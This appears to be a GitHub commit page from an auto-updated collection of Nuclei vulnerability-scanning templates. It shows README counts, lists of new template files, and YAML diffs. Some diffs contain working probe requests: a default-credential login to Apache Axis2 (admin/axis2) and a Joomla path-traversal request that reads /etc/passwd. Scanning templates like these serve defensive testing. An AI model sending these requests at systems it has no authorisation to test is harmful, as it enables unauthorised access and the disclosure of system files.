Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Aug 29, 2024
1 parent dfd6778 commit b137f1e
Show file tree
Hide file tree
Showing 3,626 changed files with 74,299 additions and 720,195 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
83 changes: 22 additions & 61 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -21,69 +21,30 @@
| CVE-2017 | 395 |
| CVE-2018 | 445 |
| CVE-2019 | 513 |
| CVE-2020 | 591 |
| CVE-2021 | 1731 |
| CVE-2022 | 2462 |
| CVE-2023 | 4749 |
| CVE-2024 | 4759 |
| Other | 23866 |
| CVE-2020 | 593 |
| CVE-2021 | 1732 |
| CVE-2022 | 2463 |
| CVE-2023 | 4746 |
| CVE-2024 | 4767 |
| Other | 23874 |
## 近几天数量变化情况
|2024-08-22 | 2024-08-23 | 2024-08-24 | 2024-08-25 | 2024-08-26 | 2024-08-27 | 2024-08-28|
|2024-08-23 | 2024-08-24 | 2024-08-25 | 2024-08-26 | 2024-08-27 | 2024-08-28 | 2024-08-29|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
|41305 | 41313 | 41401 | 41421 | 41432 | 41435 | 41481|
|41313 | 41401 | 41421 | 41432 | 41435 | 41481 | 41498|
## 最近新增文件
| templates name |
| --- |
| ilc-thickbox.yaml |
| Square-oauth-secret.yaml |
| Sendgrid-api.yaml |
| umbraco-delivery-api.yaml |
| blogintroduction-wordpress-plugin.yaml |
| mm-breaking-news.yaml |
| Pictatic-API-key.yaml |
| misiek-photo-album.yaml |
| malwared-byob.yaml |
| music-request-manager.yaml |
| couchdb-default-login.yaml |
| visual-sound.yaml |
| reviews-feed.yaml |
| Square-access-token.yaml |
| simple-headline-rotator.yaml |
| azindex.yaml |
| malwared-byob-rce.yaml |
| gixaw-chat.yaml |
| Shopify-token.yaml |
| rundeck-default-login.yaml |
| pocket-widget.yaml |
| quick-code.yaml |
| misiek-paypal.yaml |
| wccp-pro.yaml |
| jellyfin-default-login.yaml |
| CVE-2023-46818.yaml |
| CVE-2024-5827.yaml |
| CVE-2024-7818.yaml |
| CVE-2024-8197.yaml |
| CVE-2024-7687.yaml |
| CVE-2024-7820.yaml |
| CVE-2024-7860.yaml |
| CVE-2024-8046.yaml |
| CVE-2024-6019.yaml |
| CVE-2024-6017.yaml |
| CVE-2024-7817.yaml |
| CVE-2024-7688.yaml |
| CVE-2024-6690.yaml |
| CVE-2024-7918.yaml |
| CVE-2024-8054.yaml |
| CVE-2024-7791.yaml |
| CVE-2024-7304.yaml |
| CVE-2024-6804.yaml |
| CVE-2024-7822.yaml |
| CVE-2024-8199.yaml |
| CVE-2024-6688.yaml |
| CVE-2024-6018.yaml |
| CVE-2024-7861.yaml |
| CVE-2024-8056.yaml |
| CVE-2024-7862.yaml |
| CVE-2024-7816.yaml |
| CVE-2024-8200.yaml |
| CVE-2024-6693.yaml |
| mobsf-apktool-lfi.yaml |
| mobile-security-framework.yaml |
| Slack-api.yaml |
| relevanssi-live-ajax-search.yaml |
| salesforce-contentdocument-detector.yaml |
| elgg-sqli.yaml |
| CVE-2024-7573.yaml |
| CVE-2024-8030.yaml |
| CVE-2024-6312.yaml |
| CVE-2024-7863.yaml |
| CVE-2024-8195.yaml |
| CVE-2024-6448.yaml |
| CVE-2024-7447.yaml |
| CVE-2024-6311.yaml |
3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -172,5 +172,6 @@
"2024-08-25": 41421,
"2024-08-26": 41432,
"2024-08-27": 41435,
"2024-08-28": 41481
"2024-08-28": 41481,
"2024-08-29": 41498
}
16 changes: 15 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -49086,5 +49086,19 @@
"CVE-2024-7862.yaml": "2024-08-28 02:17:54",
"CVE-2024-7816.yaml": "2024-08-28 02:17:54",
"CVE-2024-8200.yaml": "2024-08-28 02:17:54",
"CVE-2024-6693.yaml": "2024-08-28 02:17:54"
"CVE-2024-6693.yaml": "2024-08-28 02:17:54",
"mobsf-apktool-lfi.yaml": "2024-08-29 02:21:06",
"mobile-security-framework.yaml": "2024-08-29 02:21:06",
"Slack-api.yaml": "2024-08-29 02:21:06",
"relevanssi-live-ajax-search.yaml": "2024-08-29 02:21:06",
"salesforce-contentdocument-detector.yaml": "2024-08-29 02:21:06",
"elgg-sqli.yaml": "2024-08-29 02:21:06",
"CVE-2024-7573.yaml": "2024-08-29 02:21:06",
"CVE-2024-8030.yaml": "2024-08-29 02:21:06",
"CVE-2024-6312.yaml": "2024-08-29 02:21:06",
"CVE-2024-7863.yaml": "2024-08-29 02:21:06",
"CVE-2024-8195.yaml": "2024-08-29 02:21:06",
"CVE-2024-6448.yaml": "2024-08-29 02:21:06",
"CVE-2024-7447.yaml": "2024-08-29 02:21:06",
"CVE-2024-6311.yaml": "2024-08-29 02:21:06"
}
1 change: 1 addition & 0 deletions links.csv
Original file line number Diff line number Diff line change
Expand Up @@ -449,3 +449,4 @@ https://github.com/stvnhrlnd/umbraco-nuclei-templates
https://github.com/jhonnybonny/nuclei-templates
https://github.com/fa-rrel/Nuclei-templates-xd
https://github.com/Kuray12/prv8_nuclei_templates
https://github.com/ZoomerTedJackson/Salesforce-ContentDocument-DetectorNuclei-Template
32 changes: 0 additions & 32 deletions nuclei-templates/CVE-2000/CVE-2000-0114.yaml

This file was deleted.

32 changes: 32 additions & 0 deletions nuclei-templates/CVE-2000/cve-2000-0114.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
id: CVE-2000-0114

info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
classification:
cve-id: CVE-2000-0114
remediation: Upgrade to the latest version.
tags: cve,cve2000,frontpage,microsoft

requests:
- method: GET
path:
- '{{BaseURL}}/_vti_inf.html'

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "_vti_bin/shtml.dll"

# Enhanced by mp on 2022/01/27
33 changes: 0 additions & 33 deletions nuclei-templates/CVE-2005/CVE-2005-2428.yaml

This file was deleted.

25 changes: 25 additions & 0 deletions nuclei-templates/CVE-2005/cve-2005-2428.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2005-2428
info:
name: CVE-2005-2428
author: CasperGN
severity: medium

description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495

requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body
49 changes: 49 additions & 0 deletions nuclei-templates/CVE-2010/CVE-2010-0219.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,49 @@
id: CVE-2010-0219

info:
name: Apache Axis2 Default Login
author: pikpikcu
severity: high
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
tags: cve,cve2010,axis,apache,default-login,axis2
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
classification:
cve-id: CVE-2010-0219

requests:
- raw:
- |
POST /axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginUsername={{username}}&loginPassword={{password}}
- |
POST /axis2/axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName={{username}}&password={{password}}&submit=+Login+
payloads:
username:
- admin
password:
- axis2
attack: pitchfork

matchers-condition: and
matchers:

- type: word
words:
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"

- type: status
status:
- 200

# Enhanced by mp on 2022/03/02
28 changes: 28 additions & 0 deletions nuclei-templates/CVE-2010/CVE-2010-1873.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
id: CVE-2010-1873

info:
name: Joomla! Component Jvehicles SQL Injection
author: daffainfo
severity: high
description: A SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
reference:
- https://www.exploit-db.com/exploits/11997
- https://www.cvedetails.com/cve/CVE-2010-1873
tags: cve,cve2010,joomla,lfi,sql-injection
classification:
cve-id: CVE-2010-1873

requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

# Enhanced by mp on 2022/03/20
53 changes: 0 additions & 53 deletions nuclei-templates/CVE-2010/cve-2010-0219.yaml

This file was deleted.

Loading

0 comments on commit b137f1e

Please sign in to comment.